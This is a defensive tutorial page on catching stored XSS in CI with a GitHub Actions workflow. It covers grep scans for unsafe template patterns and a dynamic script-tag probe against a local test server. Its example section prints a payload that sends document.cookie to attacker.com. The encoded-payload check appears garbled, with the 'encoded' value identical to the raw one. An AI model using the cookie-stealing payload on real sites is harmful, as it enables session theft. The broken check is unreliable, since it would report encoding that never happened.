HTML-Encode User Content in Automated Security Scanning Workflows
Detect and prevent XSS vulnerabilities by automating HTML entity encoding validation in your GitHub Actions security pipeline. Includes YAML workflow with grep-based XSS pattern detection.
The Problem
Your application renders user-provided content in HTML templates. A developer added a new feature and forgot to escape a field — now there's a stored XSS vulnerability in your codebase. You caught it in a security audit three months later. You need automated detection in CI.
Why This Matters
XSS (Cross-Site Scripting) is consistently in OWASP's Top 10 vulnerabilities. Stored XSS allows attackers to inject malicious scripts that run in other users' browsers — stealing cookies, impersonating users, or redirecting to phishing pages. Finding this in CI (seconds) costs nothing. Finding it in a penetration test costs $10,000+. Finding it after a breach costs millions.
Step-by-Step Instructions
Test HTML encoding with the tool below
Paste sample user-generated content into the HTML encoder. Verify that <, >, &, ", and ' are properly encoded. Use these encoded values as expected outputs in your security tests.
Add a pattern-based XSS scan to your workflow
Use grep -rn to scan your templates for patterns that indicate unescaped output. In Jinja2: flag {{ variable }} (auto-escapes) but alert on {{ variable | safe }} (bypasses escaping). In React: flag dangerouslySetInnerHTML.
Run a dynamic XSS probe with a known payload
In your integration test suite, submit the classic XSS probe string <script>alert(1)</script> as user input and verify it appears encoded in the HTML response. Any unencoded output is a vulnerability.
Block PRs that introduce unsafe HTML patterns
Fail the CI check when new | safe filters or innerHTML assignments are introduced. Require explicit security review annotation (e.g., a comment # security: reviewed XSS safe) to bypass the check.
Try It Now — HTML Entity Encoder
Open full page →All processing happens in your browser — no data is sent to any server.
Before & After Example
<!-- Jinja2 template — VULNERABLE -->
<div class="comment">
{{ comment.text | safe }} {# ← XSS vulnerability! #}
</div>
<!-- User input that exploits this: -->
<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>
<!-- Result: browser executes attacker's JavaScript -->
name: Security Scan — XSS Detection
on: [push, pull_request]
jobs:
xss-scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Scan templates for unsafe HTML patterns
id: template_scan
run: |
echo "Scanning for potentially unsafe HTML patterns..."
# Flag | safe filters in Jinja2 (bypass auto-escaping)
UNSAFE=$(grep -rn '| safe' app/templates/ --include='*.html' || true)
# Flag innerHTML assignment in JavaScript
INNER_HTML=$(grep -rn '\.innerHTML\s*=' app/static/js/ --include='*.js' || true)
# Flag dangerouslySetInnerHTML in React
DANGEROUS=$(grep -rn 'dangerouslySetInnerHTML' src/ --include='*.jsx' --include='*.tsx' 2>/dev/null || true)
if [ -n "$UNSAFE" ] || [ -n "$INNER_HTML" ] || [ -n "$DANGEROUS" ]; then
echo "⚠️ Potentially unsafe HTML patterns detected:"
[ -n "$UNSAFE" ] && echo "--- Jinja2 | safe filters ---" && echo "$UNSAFE"
[ -n "$INNER_HTML" ] && echo "--- innerHTML assignments ---" && echo "$INNER_HTML"
[ -n "$DANGEROUS" ] && echo "--- dangerouslySetInnerHTML ---" && echo "$DANGEROUS"
echo ""
echo "Review each occurrence. Add '# security: reviewed XSS safe' comment if intentional."
echo "unsafe_found=true" >> $GITHUB_OUTPUT
else
echo "✓ No unsafe HTML patterns found"
echo "unsafe_found=false" >> $GITHUB_OUTPUT
fi
- name: Start test server
run: .venv/bin/uvicorn app.main:app --host 0.0.0.0 --port 8000 &
timeout-minutes: 1
- name: Run dynamic XSS probe
run: |
# Wait for server to start
sleep 2
XSS_PAYLOAD='<script>alert("xss")</script>'
ENCODED_PAYLOAD='<script>alert("xss")</script>'
# Submit XSS payload as a comment
RESPONSE=$(curl -s -X POST http://localhost:8000/api/comments \
-H 'Content-Type: application/json' \
-d "{"text": "$XSS_PAYLOAD"}")
# Fetch the page that renders comments
PAGE=$(curl -s http://localhost:8000/comments/)
if echo "$PAGE" | grep -qF "$XSS_PAYLOAD"; then
echo "❌ XSS VULNERABILITY DETECTED: raw script tag found in response"
exit 1
elif echo "$PAGE" | grep -qF "$ENCODED_PAYLOAD"; then
echo "✓ XSS safe: payload was properly HTML-encoded"
else
echo "⚠️ Could not verify XSS encoding — manual review required"
fi
- name: Fail on unsafe patterns (require review)
if: steps.template_scan.outputs.unsafe_found == 'true'
run: |
echo "CI blocked: unsafe HTML patterns require security review"
exit 1
Frequently Asked Questions
Does Jinja2 auto-escape HTML by default?
In Flask and FastAPI, Jinja2 auto-escaping is enabled for .html, .htm, .xml, and .xhtml templates. The {{ var }} syntax is safe. The {{ var | safe }} filter bypasses escaping and should be used only for trusted, pre-sanitized HTML.
What's the difference between HTML encoding and sanitization?
Encoding converts < to < — safe for text content but removes formatting. Sanitization (e.g., via DOMPurify or bleach) allows some HTML tags (bold, links) while blocking dangerous ones (script, onerror). Use encoding for plain text fields, sanitization for rich text editors.
Can I use semgrep for more comprehensive XSS detection?
Yes. semgrep --config=p/xss has rules for Jinja2, React, Angular, and Django XSS patterns. It's free for open source and available as a GitHub Action (returntocorp/semgrep-action). Add it alongside grep-based checks for defense in depth.
Related Workflows
Want the full HTML Entity Encoder experience?
Open the standalone tool for more space, keyboard shortcuts, and additional features.
Open HTML Entity Encoder →